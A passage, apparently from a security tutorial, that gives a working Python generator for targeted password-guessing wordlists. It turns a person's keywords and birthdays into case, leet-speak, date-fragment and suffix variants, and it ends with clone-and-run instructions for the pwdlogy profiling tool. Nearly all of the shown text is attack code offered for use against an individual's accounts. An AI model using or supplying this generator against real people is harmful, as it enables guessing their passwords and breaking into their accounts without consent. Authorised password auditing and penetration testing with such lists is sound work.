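# Common leet substitutions (assumption; extend to taste)
LEET = str.maketrans({"a": "@", "e": "3", "i": "1", "o": "0", "s": "$"})


def case_variants(word):
    """lower, Capitalized, UPPER and a leet-speak form of one keyword."""
    w = word.strip().lower()
    return {w, w.capitalize(), w.upper(), w.translate(LEET)}


def date_fragments(ddmmyyyy):
    """Pieces of a DDMMYYYY birthday people actually type, e.g. 1990, 90, 0307, 030790, 03071990."""
    if len(ddmmyyyy) != 8 or not ddmmyyyy.isdigit():
        raise ValueError("birthday must be DDMMYYYY: %r" % ddmmyyyy)
    dd, mm, yyyy = ddmmyyyy[:2], ddmmyyyy[2:4], ddmmyyyy[4:]
    return [yyyy, yyyy[2:], dd + mm, dd + mm + yyyy[2:], ddmmyyyy]


def generate(keywords, birthdays, suffixes=("", "!", "123"), pair_keywords=True):
    """Candidate set: keyword variants x date fragments x suffixes, plus keyword pairs."""
    bases = set()
    for kw in keywords:
        bases |= case_variants(kw)
    if pair_keywords:
        lowers = [k.strip().lower() for k in keywords]
        bases |= {a + b for a, b in itertools.permutations(lowers, 2)}
    frags = [""] + [f for b in birthdays for f in date_fragments(b)]
    return sorted(base + frag + suf for base in bases for frag in frags for suf in suffixes)


def write_wordlist(words, path="gen.txt"):
    """Write one candidate per line, the layout pwdlogy's gen.txt uses; returns the count."""
    with open(path, "w") as fh:
        fh.write("\n".join(words) + "\n")
    return len(words)


if __name__ == "__main__":
    print("wrote %d candidates" % write_wordlist(generate(KEYWORDS, BIRTHDAYS)))
```

Keep the list focused: every extra variant rule multiplies the output, and a profile-based list earns its keep by being a few thousand well-chosen candidates, not a generic rockyou replacement.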

Usage and download from source:

git clone https://github.com/tch1001/pwdlogy && cd pwdlogy
python pwdlogy.py
help    (type at the pwdlogy prompt to list the available commands, such as start and custom)

Source: https://github.com/tch1001
